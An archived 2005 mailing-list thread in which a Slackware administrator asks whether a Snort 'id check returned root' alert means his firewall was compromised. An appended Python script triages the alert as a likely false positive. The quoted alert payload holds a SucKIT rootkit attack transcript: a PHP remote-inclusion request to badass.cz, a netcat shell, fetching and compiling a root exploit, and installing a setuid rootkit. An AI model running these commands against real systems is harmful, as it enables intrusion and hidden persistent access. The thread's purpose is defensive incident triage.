[wplug] Need help with a snort alert. Did my box get hacked?

Jason Carr jason at flacid.org
Fri Oct 21 15:40:29 EDT 2005


A little off topic, but please, please make sure that your Snort isn't
running Back Orifice detection; there are reports about possibly making
a worm, which just makes people want to write the worms...

http://www.securityfocus.com/news/11349?ref=rss

- Jason

On Fri, 2005-10-21 at 09:12 -0400, Chris Romano wrote:
> I came in this morning and checked my snort alerts (morning routine),
> and noticed the following:
> 
> ATTACK-RESPONSES id check returned root            2005-10-21 07:40:32
> 82.165.25.125:80             10.10.10.5:51949             TCP
> 
> Some background.  10.10.10.x is my dmz and 10.10.10.5 is a
> firewall/proxy (Slack 10.1) that connects the 10.10.10.x to our
> 192.168.0.x internal network.
> So I started digging around. The alert logged the following:
> 
> SUCKIT v 1.1c - New, singing, dancing, world-smashing rewtkit  *.* 
> (c)oded by sd at sf.cz & devik at cdi.cz, 2001 
> Configuring ./sk:.OK!.[attacker at badass.cz ~/sk10]$ telnet lamehost.com
> 80.Trying 192.160.0.2.... Connected to lamehost.com..Escape character
> is '^]'..GET /bighole.php3?inc=http://badass.cz/egg.php3
> HTTP/1.1.Host: lamehost.com ..HTTP/1.1 200 OK.Date: Thu, 18 Oct 2001
> 04:04:52 GMT.Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux)
> PHP/4.0.4pl1.Last-Modified: Fri, 28 Sep 2001 04:42:34 GMT.ET ag:
> "31c6-c2-3bb3ffba".Content-Type: text/html..IT WERKS! Shell
> at port 8193 Connection closed by foreign
> host..[attacker at badass.cz~/sk10]$ nc -v lamehost.com 8193.lamehost.com
> [192.168.0.2] 8193 (?) open.w.12:08am up  1:20,  3 users,  load
> average: 0.05, 0.06,0.08.USER     TTY      FROM    LOGIN at IDLE   JCPU
> PCPU  AT.root   tty1     -  11:58pm 39:03   3.15s  2.95s
> bash.cd /tmp.lynx -dump http://badass.cz/s.c > s.c.gcc s.c o
> super-duper-hacker-user-rooter../super-duper-hacker-user-rooter.id.uid=0(root) gid=0(root) groups=0(root).cd /usr/local/man/man4.mkdir .l33t.cd .l33t.lynx -dump http://badass.cz/~attacker/sk10/s
> k > sk.chmod+s+u sk../sk.* * * * * * * * * * * * * * * * * * * * *
> * * * * * * * * * * * *.*SUCKIT v1.1c - New, singing, dancing, w
> 
> OK, there are a few things that make me think that this is a false
> positive.  First is the "192.160.0.02" IP.  That is not on this
> network.  Second, there is no host on 192.168.0.2.  Third, I do not
> have any Red Hat machines.  They are all Slackware.  I am still
> concerned.  I searched for "sk" and all I found are two directories
> related to vim and I didn't find a directory called "l33t".
> 
> Can anyone help me verify that I wasn't hacked?
> 
> Thanks,
> Chris
> _______________________________________________
> wplug mailing list
> wplug at wplug.org
> http://www.wplug.org/mailman/listinfo/wplug
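The reasoning in Chris's post (the match sits in a web page fetched through the proxy, and the addresses in the payload do not belong to his network) can be turned into a small triage script. This is an added example, not code from the thread; the alert line and payload excerpt are constructed copies of what the post shows, and the /24 masks for the two networks are assumed.

```python
import ipaddress
import re

# Constructed copy of the alert line as it appears in the post (one-line form).
ALERT = ("ATTACK-RESPONSES id check returned root 2005-10-21 07:40:32 "
         "82.165.25.125:80 10.10.10.5:51949 TCP")

# Constructed, shortened excerpt of the captured payload quoted in the post.
PAYLOAD = ("GET /bighole.php3 HTTP/1.1.Host: lamehost.com..HTTP/1.1 200 OK."
           "Server: Apache/1.3.14 (Unix) (Red-Hat/Linux).Content-Type: text/html.."
           "Trying 192.160.0.2.... lamehost.com [192.168.0.2] 8193 (?) open."
           "id.uid=0(root) gid=0(root) groups=0(root)")

# The DMZ and internal networks described in the post (/24 masks assumed).
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("10.10.10.0/24", "192.168.0.0/24")]

ALERT_RE = re.compile(
    r"^(?P<msg>.+?)\s+(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>\w+)$")

def is_local(ip):
    return any(ipaddress.ip_address(ip) in net for net in LOCAL_NETS)

def parse_alert(line):
    m = ALERT_RE.match(line.strip())
    if not m:
        raise ValueError("unrecognised alert line: %r" % line)
    a = m.groupdict()
    a["sport"], a["dport"] = int(a["sport"]), int(a["dport"])
    return a

def triage(alert_line, payload):
    """Collect the observations a responder would use to judge this alert."""
    a = parse_alert(alert_line)
    notes = []
    # Direction: external port 80 -> internal ephemeral port means the matched
    # bytes sit in an HTTP response the proxy fetched, not in output of a local shell.
    from_web = a["sport"] == 80 and a["dport"] > 1023 and not is_local(a["src"])
    if from_web:
        notes.append("match is inside an HTTP response from an external web server")
    is_html = bool(re.search(r"HTTP/1\.[01] 200 OK", payload)) and "text/html" in payload
    if is_html:
        notes.append("payload is an HTML document, so uid=0(root) is page text")
    # Addresses named in the payload: local ones need a host check, others are not ours.
    for ip in sorted(set(re.findall(r"\b\d{1,3}(?:\.\d{1,3}){3}\b", payload))):
        try:
            local = is_local(ip)
        except ValueError:  # not a real IPv4 address (e.g. a version string)
            continue
        notes.append(f"{ip} is on a local network: confirm a host exists there"
                     if local else f"{ip} is not on any local network")
    verdict = "likely false positive" if from_web and is_html else "needs host inspection"
    return {"alert": a, "verdict": verdict, "notes": notes}
```

The verdict only says the alert itself is explainable; the host checks Chris did (searching for the `sk` binary and the `.l33t` directory) are still the confirmation step.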
